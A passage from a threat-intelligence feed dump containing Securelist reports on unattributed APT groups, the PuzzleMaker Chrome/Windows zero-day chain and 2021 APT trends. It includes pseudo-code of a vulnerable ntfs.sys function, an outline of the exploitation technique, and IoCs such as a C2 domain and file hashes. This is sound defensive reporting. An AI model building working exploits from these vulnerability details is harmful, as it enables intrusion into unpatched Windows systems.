malware loader. To achieve this goal, it injects itself into the command chain of these applications as a plugin or a dynamic linked library. When the user runs the infected app, the malware launches, too. The malware is not widespread and is most likely used in highly targeted attacks involving a human asset.\n\nSince my post on Twitter, [our colleagues at ESET shared further information](<https://twitter.com/0xfmz/status/1573321520570671105>) on this toolset, which includes their suspicion that it might be associated with the Lamberts APT group:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130040/TOP-_10_unattributed_APT_mysteries_03-1024x606.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130040/TOP-_10_unattributed_APT_mysteries_03.png>)\n\n## 6\\. TENSHO (aka White Tur)\n\nIn early 2021, while searching for phishing pages that spoofed governmental websites, researchers at the PwC company [stumbled across a page](<https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html>) used to phish for Serbian Ministry of Defense credentials. This page led them to a previously unknown threat actor dubbed "TENSHO" or "White Tur". This actor has been active since at least 2017 and uses a variety of unique techniques and tools, which include weaponized documents, HTA and PowerShell scripts, Windows executables, and phishing pages that mimic governmental websites.\n\nAmong other tools, TENSHO uses the OpenHardwareMonitor open-source project, whose legitimate purpose is to monitor device temperature, fan speed, and other hardware health data. The threat actor spreads a malicious OpenHardwareMonitor package designed to deliver TENSHO's malware in the form of a PowerShell script or Windows binary.\n\nTo date, no ties have been discovered between this threat actor and any known APT group. TENSHO targets organizations inside Serbia and Republika Srpska (an entity in Bosnia and Herzegovina) indicating a very specific regional interest. Because many parties might be interested in targeting these regions, it is not easy to attribute the threat.\n\n## 7\\. PlexingEagle\n\nDuring the HITBSec 2017 conference in Amsterdam, Emmanuel Gadaix presented the discovery of a highly interesting GSM cyberespionage toolset, likely deployed by a very advanced threat actor, found during a routine security sweep in a client's systems.\n\n[![A Surprise Encounter With a Telco APT, by courtesy of Emmanuel Gadaix](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130131/TOP-_10_unattributed_APT_mysteries_04-1024x569.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/10/06130131/TOP-_10_unattributed_APT_mysteries_04.png>)\n\n**_[A Surprise Encounter With a Telco APT](<https://conference.hitb.org/hitbsecconf2017ams/materials/D2T4%20-%20Emmanuel%20Gadaix%20-%20A%20Surprise%20Encounter%20With%20a%20Telco%20APT.pdf>), by courtesy of Emmanuel Gadaix_**\n\nThe compromise was originally discovered by Gadaix' team on a Solaris 10 machine that was used by the actors as an operating base. From there, the attackers leveraged advanced knowledge of the GSM infrastructure and network to patch the functionality normally used by law enforcement for eavesdropping on phone calls in order to implement their own mechanisms for intercepting calls of interest. The malware used in the intrusion was written using LUA, a language we saw used by other advanced threat actors, such as the ones behind Flame and Project Sauron. In his presentation, Gadaix hints at a number of similarities between this case and the so-called "Athens Affair", the two being the only known cases of this threat actor actually being caught in the wild.\n\n## 8\\. SinSono\n\nIn May 2021, Syniverse, a telecom company that provides text message routing services to such carriers as At&T, Verizon, T-Mobile, and others, detected [unauthorized access to its IT systems](<https://www.theverge.com/2021/10/6/22713543/syniverse-hack-five-years-text-messages>). An internal investigation revealed that an unknown adversary first penetrated Syniverse's infrastructure in 2016. For five years they had acted undetected, accessed internal databases, and managed to compromise about 235 customers' login credentials for the company's Electronic Data Transfer (EDT) environment. Through these accounts, the threat actor could access highly sensitive consumer data, e.g., call records and the contents of text messages.\n\nWhile the company reset or inactivated credentials for all EDT customers, and contacted affected organizations, many questions remain: for instance, if the actor had actually stolen sensitive data or not. Although the company itself and some of the carriers relying on its services see no indicators of a major breach and no attempt to disrupt their processes, we know neither who the actor was nor what their goals were. Our analysis of the data related to the attack indicates a high degree of attention and care regarding operational security and ensuring that attribution is difficult.\n\n## 9\\. MagicScroll (aka AcidBox)\n\nMagicScroll is a sophisticated malicious framework that was [first detected](<https://unit42.paloaltonetworks.com/acidbox-rare-malware/>) by Palo Alto's Unit 42 in 2019. It is a type of multistage malware with only a few known samples and one known victim, located in Russia and attacked in 2017. The initial infection stage of MagicScroll is missing. The first known stage is a loader that was created as a [security support provider](<https://learn.microsoft.com/en-us/windows/win32/secauthn/custom-security-packages>), a DLL that usually provides certain security features, such as application authentication. MagicScroll abuses this functionality to achieve injection into the lsass.exe process and probably persistence as well.\n\nThe loader's main purpose is to decrypt and load the next-stage module, which is stored in the registry. This module exploits a VirtualBox driver vulnerability to load an unsigned malicious driver in kernel mode. According to Unit 42, the exploitation of this vulnerability was previously observed in [Turla](<https://securelist.com/tag/turla/>) operations, however there is no indication that the new actor has any links to that group. Unit 42 also found some loose similarities with [ProjectSauron](<https://securelist.com/faq-the-projectsauron-apt/75533/>), but they stated that these are too weak for considering the two campaigns linked. Neither have we found any ties between MagicScroll and any other known APTs.\n\n## 10\\. Metador\n\nThe Metador threat actor was [first publicly described](<https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/>) by SentinelLabs in September 2022. It mainly targets ISPs, telecommunication companies, and universities in several countries in the Middle East and Africa; at least one of its victims has been attacked by nearly ten different APT groups.\n\nMetador operates two malware platforms dubbed "metaMain" and "Mafalda", which are deployed purely in memory. The metaMain platform is a feature-rich backdoor, which provides the threat actor with long-term access to the infected system. It can log keyboard and mouse events, make screenshots, download and upload files, and execute arbitrary shellcode.\n\nMafalda is a backdoor that is being actively developed. Its latest version was compiled with a timestamp of December 2021. It features a number of anti-analysis techniques and supports 67 commands, which is 13 more than in the previous version of the malware.\n\nApart from typical backdoor functionality, metaMain and Mafalda are capable of establishing connections to other (yet unknown) implants and exchange data with these. One of those implants is called "Cryshell" and acts as intermediate server between metaMain or Mafalda, and the C2. There are reasons to believe that unknown Linux implants exist that can send data collected from Linux machines to Mafalda.\n\nIt is yet to be established who the actor behind Metador is and what their goals are. The sophisticated malware designed to stay undetected for a long time suggests that this is a cyberespionage campaign by a high-end threat actor. At least some of the C2 responses are in Spanish, which may indicate that the actor or some of its developers speak Spanish. Also, some cultural references were found in Metador's malware, including British pop punk lyrics and Argentinian political cartoons. The diversity of traces makes it difficult to determine in which state's interests it operates\u2014if at all. One of the hypotheses is that the group is a high-end contractor.\n\n## Conclusion\n\nAdvanced threat actors use every possible means to stay undetected, and\u2014if caught\u2014unattributed. Every now and then, security researchers will reveal a mysterious campaign that has remained uncovered for years and that is nearly impossible to trace back to its benefactors with certitude. The ten stories described in this post are just some of the many unattributed mysteries we have seen through the years. That is why it is important to discuss them and share data on them within the cybersecurity community.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-07T10:00:47", "type": "securelist", "title": "TOP 10 unattributed APT mysteries", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2022-10-07T10:00:47", "id": "SECURELIST:8BBBF7B71E6D52B912070367475B6567", "href": "https://securelist.com/top-10-unattributed-apt-mysteries/107676/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:02", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21111141/abstract_blur_code-990x400.jpg)\n\nOn April 14-15, 2021, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges.\n\nThe elevation of privilege exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, 2021, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the elevation of privilege vulnerability. Both vulnerabilities were patched on June 8, 2021, as a part of the June Patch Tuesday.\n\n## Remote code execution exploit\n\nAll of the observed attacks were conducted through Chrome browser. Unfortunately, we were unable to retrieve the JavaScript with full exploit code, but the timeframe of attacks and events preceding it led us to suspect one particular vulnerability.\n\nOn April 6-8, 2021 the Pwn2Own competition took place. This is a computer hacking contest where the Google Chrome web browser was one of the targets. According to the ZDI (Zero Day Initiative, the organizer of Pwn2Own) [website](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>), one participating team was able to demonstrate a successful exploitation of the Chrome renderer process using a Typer Mismatch bug.\n\nOn April 12, 2021, the developers of Chromium committed two (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>), issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>)) Typer-related bug fixes to the open-source repository of V8 \u2013 a JavaScript engine used by Chrome and Chromium web browsers. One of these bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>)) was intended to patch a vulnerability that was used during Pwn2Own, and both bug fixes were committed together with regression tests \u2013 JavaScript files to trigger these vulnerabilities. Later on the same day, a user with the Twitter handle @r4j0x00 published a working remote code execution exploit on GitHub, targeting an up-to-date version of Google Chrome. That exploit used a vulnerability from issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>) to execute a shellcode in the context of the browser renderer process.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png>)\n\n**_Screenshot of tweet with Chrome zero-day published on April 12, 2021_**\n\nThe published exploit didn't contain a sandbox escape exploit and was therefore intended to work only when the browser was launched with the command line option _-no-sandbox_.\n\nOn April 13, 2021, Google released Chrome update 89.0.4389.128 for Windows, Mac and Linux with a fix for two vulnerabilities; CVE-2021-21220 (used during Pwn2Own) was one of them.\n\nSome of our customers who were attacked on April 14-15, 2021, already had their Chrome browser updated to 89.0.4389.128, and that's why we think the attackers didn't use CVE-2021-21220 in their attacks.\n\nOn April 14, 2021, Google released Chrome update 90.0.4430.72 for Windows, Mac and Linux with a fix for 37 vulnerabilities. On the same day, a new Chrome exploit was presented to the public.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png>)\n\n**_Screenshot of GitHub repository with Chrome zero-day published on April 14, 2021_**\n\nThis newly published exploit used a vulnerability from issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>), worked on the newly released Chrome 90.0.4430.72, and was fixed as CVE-2021-21224 only a few days later, on April 20, 2021.\n\nWe suspect the attackers were also able to use this JavaScript file with regression test to develop the exploit (or acquire it from someone else) and were probably using CVE-2021-21224 in their attacks.\n\n## Elevation of privilege exploit\n\nCVE-2021-31955 is an information disclosure vulnerability in ntoskrnl.exe. The vulnerability is affiliated with a Windows OS feature called SuperFetch. It was introduced in Windows Vista and is aimed to reduce software loading times by pre-loading commonly used applications into memory. For SuperFetch purposes the function _NtQuerySystemInformation_ implements a special system information class _SystemSuperfetchInformation_. This system information class incorporates more than a dozen of different SuperFetch information classes. The vulnerability lies in the fact that data returned by the _NtQuerySystemInformation_ function for the SuperFetch information class _SuperfetchPrivSourceQuery_ contains EPROCESS kernel addresses for currently executed processes.\n\nIt's noteworthy that this vulnerability can be observed in code that was available on [GitHub](<https://github.com/zodiacon/WindowsInternals/blob/master/MemInfo/MemInfo.cpp>) for a few years before we caught it in the wild and Microsoft patched it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png>)\n\n**_CVE-2021-31955 can be observed in the source code of the MemInfo utility_**\n\nThe other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function _NtfsQueryEaUserEaList_ processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via _ntoskrnl_ syscall and among other things it's possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn't check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.\n \n \n for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )\n {\n ...\n \n out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);\n \n if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )\n {\n \tea_block = eas_blocks_for_file + ea_block_pos;\n \tea_block_size = ea_block->DataLength + ea_block->NameLength + 9;\n \tif ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible\n \t{\n \tmemmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow\n \t*out_buf_pos = 0;\n \t}\n }\n else\n {\n \t...\n }\n \n ...\n \n occupied_length += ea_block_size + padding;\n out_buf_length -= ea_block_size + padding;\n padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;\n \n ...\n }\n\n**_Pseudo-code for vulnerable code in function NtfsQueryEaUserEaList_**\n\nThe exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.\n\nAs the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used "PreviousMode" technique instead. We have seen this technique used by the CHAINSHOT framework and even made a [presentation](<https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>) about it at CanSecWest/BlueHat in 2019. The exploit uses this technique to inject a malware module into the system process and execute it.\n\n## Malware modules\n\nBesides the aforementioned exploits, the full attack chain consists of four additional malware modules, which will be referred to as:\n\n * Stager\n * Dropper\n * Service\n * Remote shell\n\nThe stager module is used to notify that exploitation was successful. It also downloads and executes a more complex malware dropper module from a remote server. Each stager module is delivered to the victim with a personalized configuration blob that defines the C&C URL, Session ID, keys to decrypt the next stage of malware, and other information.\n\nAll the stager module samples that we've discovered so far were configured to use the same URL address \u2013 hxxps://p{removed}/metrika_upload/index.php \u2013 to download the encrypted malware dropper module.\n\nWe believe there is a chance that the remote code execution JavaScript exploit was also hosted on the same legitimate-looking geopolitical news portal, but we found no evidence of a classic watering hole attack. The victimology suggests a highly targeted delivery of exploits.\n\nThe dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. We couldn't find any similarities between this and other known malware.\n\nThe remote shell module has a hardcoded URL of the C&C server inside (media-seoengine[.]com). All the communication between C&C server and client is authorized and encrypted. The remote shell module is able to download and upload files, create processes, sleep for specified amounts of time and delete itself from the compromised machine.\n\nNone of the artifacts we analyzed appear to have strong connections to any known threat actors. The only similarity to CHAINSHOT we observed is the "PreviousMode" technique, although this is publicly known and may be used by various groups. We are calling the threat actor behind these attacks PuzzleMaker.\n\nKaspersky products detect this exploit and malware modules with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * UDS:DangerousObject.Multi.Generic\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected many zero-days, repeatedly proving their effectiveness. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.\n\nKaspersky would like to thank Microsoft for their prompt analysis of the report and patches.\n\n## IoCs\n\nmedia-seoengine[.]com\n\n**%SYSTEM%\\WmiPrvMon.exe**\n\nMD5 [09A5055DB44FC1C9E3ADD608EFFF038C](<https://opentip.kaspersky.com/09A5055DB44FC1C9E3ADD608EFFF038C/>) \nSHA-1 [BFFA4462901B74DBFBFFAA3A3DB27DAA61211412](<https://opentip.kaspersky.com/BFFA4462901B74DBFBFFAA3A3DB27DAA61211412/>) \nSHA-256 [982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9](<https://opentip.kaspersky.com/982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9/>)\n\n**%SYSTEM%\\wmimon.dll**\n\nMD5 [D6B850C950379D5EE0F254F7164833E8](<https://opentip.kaspersky.com/D6B850C950379D5EE0F254F7164833E8/>) \nSHA-1 [E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B](<https://opentip.kaspersky.com/E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B/>) \nSHA-256 [8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6](<https://opentip.kaspersky.com/8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6/>)", "cvss3": {}, "published": "2021-06-08T17:32:30", "type": "securelist", "title": "PuzzleMaker attacks with Chrome zero-day exploit chain", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T17:32:30", "id": "SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "href": "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T10:36:53", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/29150529/ksb-2021_APT-review-year-990x400.jpg)\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 